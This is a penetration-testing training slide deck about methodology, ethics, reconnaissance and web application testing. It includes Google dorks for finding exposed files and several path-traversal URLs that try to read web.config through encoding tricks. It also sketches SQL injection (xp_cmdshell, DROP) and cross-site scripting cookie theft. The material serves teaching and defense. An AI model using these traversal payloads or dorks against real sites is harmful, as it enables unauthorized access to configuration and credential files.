Docstoc

Possible Goals of a Penetration Test

Document Sample
Possible Goals of a Penetration Test Powered By Docstoc
					Improving Application Security
through Penetration Testing



Dominick Baier (dbaier@ernw.de)
Security Consultant / BS 7799 Lead Auditor
ERNW GmbH
Outline

•   What is Penetration Testing and Auditing
•   Standards and Ethics
•   The Process of Testing
•   Pen-Testing Web Applications
•   The Tools




                                               2
"Improving the Security of Your Site by
Breaking Into it"
(Dan Farmer/Wietse Venema, 1993)
http://www.fish.com/security/admin-guide-to-cracking.html




                                                            3
Penetration Testing vs. Auditing

•   Penetration Testing
     – Simulating a motivated attacker for a specific amount of time
     – Black Box / White Box Approach
     – Is more like a snapshot of the current security of a system or a
       business process


•   Auditing
     – Analyzing
        • Configuration Files
        • Architecture
        • Source Code
     – Policy conformance
        • Operational Plans and Procedures

                                                                          4
Why Penetration Testing

•   To measure the security of a system, network or a business
    process
     – By a third party

•   To assess possible Risks

•   To make the upper management "security aware"




                                                                 5
Possible Goals of a Penetration Test

•   How much information about our network is publicly
    available ?
•   Is it possible to compromise this and that system ?
•   Is it possible to disturb business process X ?
•   How effective work our security controls ?
     – Firewall
     – AntiVirus / Spam / Content Filter
     – Intrusion Detection Systems
•   Is our Information Security Policy correctly enforced ?
•   Can employees compromise workstation security?

•   "Are we safe ?"



                                                              6
What can be tested

•   Servers and Workstations
     – Web Server
     – Database Server
     – Domain Controller
     – Workstations
•   Infrastructure
     – Network Devices
     – Wireless Networks
     – Dial-In Access
     – VPNs
•   Applications
•   Employees (Social Engineering)


                                     7
Attackers to simulate

•   Outside Attackers
     – Script Kiddies
     – Competitors
     – Terrorists
     – Journalists

•   Insiders
     – Employees
     – Disgruntled Employees
     – Contractors
     – Consultants




                               8
Standards

•   Pete Herzogs's OSSTM
    "Open Source Security Testing Methodology Manual"
     – Very practical approach
     – Checklists of what and in which order to test
     – List of tools

•   ISO 17799 / BS 7799 Standard for Information Security
     – Focuses more on the policy and paper work side of security
     – Extensive catalog of security controls
     – Defines a standard for audits

•   NIST Guidelines for Network Security Testing



                                                                    9
Ethics

•   Findings are under strict NDAs

•   No information gathered during the test
     – is sent in clear text over the internet
     – is used for personal profit

•   ISACA Code of Professional Ethics
•   ISC2 Code of Ethics

•   Full Disclosure




                                                 10
The STRIDE Threat Model

•   STRIDE
     – Spoofing Identity
     – Tampering with data
     – Repudiation
     – Information Disclosure
     – Denial of Service
     – Elevation of Privilege




                                11
The Pen-Tester's Mantra

•   Segregation of Duties
•   Minimal Machine
•   Least Privilege
•   Patch-Level
•   Defense in Depth
•   Secure the Weakest Link
•   Strong Authentication




                              12
Course of Actions

•   Opening Meeting
     – Goals of the Pen-Test
     – Scope
     – Responsible Admins

•   The Audit / Test itself

•   The Report
     – Found issues
     – Countermeasures
     – Prioritization

•   Closing Meeting



                               13
Stages of a Pen-Test

•   Gathering Information
•   Analyzing the Infra-Structure
•   Analyzing the Machines
     – Fingerprinting
     – Port / Vulnerability-Scanning
     – Attacking the System / Proof of Concept
•   Analyzing Applications
     – Functional / Structural Analysis
     – Attacking Authentication and Authorization
     – Attacking Data and Back-End Communication
     – Attacking Clients




                                                    14
Information Gathering

•   In this phase you try to compile as much publicly available
    information as possible

    –   Internic
    –   IANA / RIPE
    –   Whois
    –   Google / Usenet
    –   Private homepages of employees
    –   Email Addresses
    –   Telephone numbers




                                                                  15
16
17
Information Gathering

•   Google Search-Syntax

    –   allintitle:”Index of /etc”
    –   site:gov site:mil site:ztarget.com
    –   filetype:doc filetype:pdf filetype:xls
    –   intitle:, inurl:, allinurl:
    –   allinurl:mssql, allinurl:gw …
    –   inurl:".aspx?ReturnUrl="
    –   "+www.ernw.+de"
    –   related:www.ernw.de
    –   login site:www.microsoft.com
    –   [cached]


                                                 18
19
20
21
22
23
24
Information Gathering

•   Mailing-Lists / Forums / Usenet
     – Some vendors even post internal support questions to public
       newsgroups




                                                      ?


                                                                     25
Information Gathering

•   Mailing-Lists / Forum / Usenet




                                     Invitation?



                                                   26
Analyzing the Infra-Structure and Machines

•   A layered modell


              Data                   Data

          Application             Application

            Service                Service

               OS                     OS

                        Network


                                                27
Analyzing the Infra-Structure and Machines

•   The Reality
                       Auth                                        Data
                     Database


                          LDAP




              HTTP               DCOM                  SOCKETS

                                 CORBA

                      Web                Application             Database
Browser              Server                Server                 Server




                      Web                                         Audit
                     Content                                      Logs




                                                                            28
Analyzing the Infra-Structure and Machines

•   Querying System and DNS Information
•   Portscanning
•   Fingerprinting
•   Vulnerability Scanning
•   Exploiting a Vulnerability




                                             29
Querying System and DNS Information

•   TraceRoute
     – Tracing the network route give you information about
        • The provider
        • Type of connection
           – Simple / Redundant / Load Balanced
     – At which hop gets ICMP blocked?




                                                              30
Querying System and DNS Information

•   DNS Zone transfer
     – DNS Server should be configured to allow Zone Transfers only
       to specific peers
     – DNS Zones are very interesting
        • Which machines are listed in the Zone
        • Get information about IP network-structure




                                                                      31
Portscanning & Fingerprinting

•   Port Scanning gives you information about which ports a
    machine listens on
•   Every open port is potentially vulnerable
•   More advanced scanners try to figure out what kind of
    software (+ vendor and version) is installed



•   Most popular Port Scanners
     – SuperScan (www.foundstone.com)
     – NMAP (www.insecure.org/nmap)




                                                              32
Banner Grabbing

•   Connect with Netcat or Telnet to a service
•   You will often get detailed information




                                                 33
Vulnerability Scanner

•   Automated scanners that check for known vulnerabilities
     – They often give you more information for vulnerability
       investigation

•   There are vulnerability and exploit databases on the internet
     – SecurityFocus (www.securityfocus.com)
     – Packet Storm (www.packetstormsecurity.com)




                                                                    34
Vulnerability Scanner

•   System / Host Scanner
     – Nessus (www.nessus.org)
     – Retina (www.eeye.com)
     – ISS Security Scanner (www.iss.net)
     – Microsoft MBSA (www.microsoft.com)

•   Database Scanner
     – MetaCoreTex (www.metacoretex.com)
     – AppSecInc AppDetective (www.appsecinc.com)
     – ISS Database Scanner (www.iss.net)

•   Web Server Scanner
    – Nikto (www.cirt.net)



                                                    35
Vulnerability Investigation

•   www.securityfocus.com/bid




                                36
Vulnerability Investigation

•   www.packetstormsecurity.org




                                  37
Pen-Testing Web Applications

•   Visualize the HTTP Traffic
     – Sniffer (e.g. Ethereal)
     – Web Proxies
        • Achilles (http://packetstormsecurity.nl/web/achilles-0-27.zip)
        • Fiddler (www.fiddlertool.com)
        • WebProxy (www.atstake.com)
     – Hand craft HTTP Requests
        • Wfetch & Tinyget (IIS6 Resource Kit)

Page         Path      Auth?     SSL?        GET/POST     Comment
Index.aspx   /         N         N
login.aspx   /login/   N         Y           POST         Login Page
about.aspx   /about/   N         N                        Email
                                                          Addresses

                                                                           38
Structural Analysis

•   ...or graphical




                      39
Pen-Testing Web Applications

•   Try some URLs
     – Common Directories
         • /html, /images, /jsp, /cgi
     – "Hidden" Directories
         • /admin, /secure, /adm, /management
     – Backup and Log Files
         • /.bak, /backup, /back, /log, /logs, /archive, /old
     – Include Files
         • /include, /inc, /js, /global, /local
     – Lokalized Versions
         • /de, /en, /1033
     – trace.axd

•   Look at the HTTP Status Codes
     – Everything besides 404 ist interesting


                                                                40
Pen-Testing Web Applications

•   Look for
     – Cascading Style Sheets (.css)
     – XML Dateien / XML Stylesheets (.xml / .xsl)
     – JavaScript Dateien (.js)
     – Include Files (.inc)
     – Text Dateien (.txt)
     – Comments
     – Client-Side Validation
     – Forms
        • Hidden Fields
        • Password Fields
        • MaxLength Attributes


                                                     41
  Pen-Testing Web Applications

  •   "Odd" Query Strings

www.site.com/show.aspx?content=marketing.xml
www.site.com/UserArea/default.php?UserID=5
www.site.com/dbsubmit.php?Title=Mr&Phone=123
www.site.com/menu.asp?sid=73299


  •   Cookie values




                                               42
Canonicalization Errors

•   Popular Examples
     – Apache WebServer
        • /scripts und /SCRIPTS
     – Microsoft IIS 5
        • ../ and .%2e%2f
     – ISS Firewall
        • action=delete and action=%64elete
     – Microsoft IE4
        • Dotless IP Bug

    – ASP.NET Authorization Canonicalization Bug
       • http://localhost/formsec/secure%5csecret.aspx


                                                         43
Resource Names

•   Example

http://server/cms/show.aspx?file=content.xml


•   Can I use this page to show other files?

http://server/cms/show.aspx?file=../web.config



•   Try some variations
http://server/cms/show.aspx?file=../web.config.
http://server/cms/show.aspx?file=../web.config::$DATA
http://server/cms/show.aspx?file=..%5cweb.config
http://server/cms/show.aspx?file=..%255cweb.config
http://server/cms/show.aspx?file=..%%35%63web.config


                                                        44
Testing for SQL Injection

•   Try if you can inject SQL code in forms
•   If the programmer simply concatenates user input with SQL
    statements a database compromise is most likely possible

•   Try to generate errors
     – Insert a ' character
     – Does the application behave different ?
     – Is maybe even a database error returned ?

•   You can execute nasty statements through SQL Injection
     – Union
     – Drop...
     – XP_CMDSHELL

                                                                45
Testing for Cross Site Scripting

•   Cross Site Scripting let's an attacker inject script code in Web
    Pages
•   This happens when the Application directly outputs client
    input whithout proper HTML encoding
•   Can be hard to find - look in
     – Query Strings
     – Form Fields
     – HTTP Headers

•   Enables Cookie Stealing / Harvesting Attacks

•   Many Developers rely on ASPX's ValidateRequest
     – Try <%00...> encoding

                                                                       46
Tools

•   Automatic Mirroring of Web Sites
     – wget (www.gnu.org/directory/wget.html)
     – Black Widow (www.softbytelabs.com)
     – Teleport Pro (www.tenmax.com)

•   Web Scanner
    – WebInspect (www.spidynamics.com)
    – NStealth (www.nstalker.com)

•   ASP.NET Specific Scanners
     – ASP.NET Security Analyzer (www.owasp.org)
     – ASP.NET Shared Hosting Analyzer (www.owasp.org)


                                                         47
Conclusion

•   Pen-Testing is no Black Magic
•   Very systematic procedure

•   If you follow the 7 golden rules, you can eliminate most of the
    vulnerabilities

•   Do regular Pen-Tests or Audits – you can only benefit
     – Internal and third party




                                                                      48
•   Questions ?




you can download the slides from www.leastprivilege.com




                                                          49
Links

•   OSSTM
     – www.isecom.org
•   NIST Draft Guidelines to Network Security Testing
     – http://csrc.nist.gov/publications/drafts/security-testing.pdf
•   ISC2 Code of Ethics:
     – https://www.isc2.org/cgi/content.cgi?category=12
•   ISACA Code of Professional Ethics
     – http://www.isaca.org/Template.cfm?Section=Code_of_Ethics1




                                                                       50
Links

•   Wfetch
     – (http://download.microsoft.com/download/d/e/5/de5351d6-
       4463-4cc3-a27c-3e2274263c43/wfetch.exe)
•   NetCat
     – http://www.atstake.com/research/
         tools/network_utilities/nc11nt.zip)




                                                                 51

				
DOCUMENT INFO
Shared By:
Tags:
Stats:
views:27
posted:3/23/2012
language:English
pages:51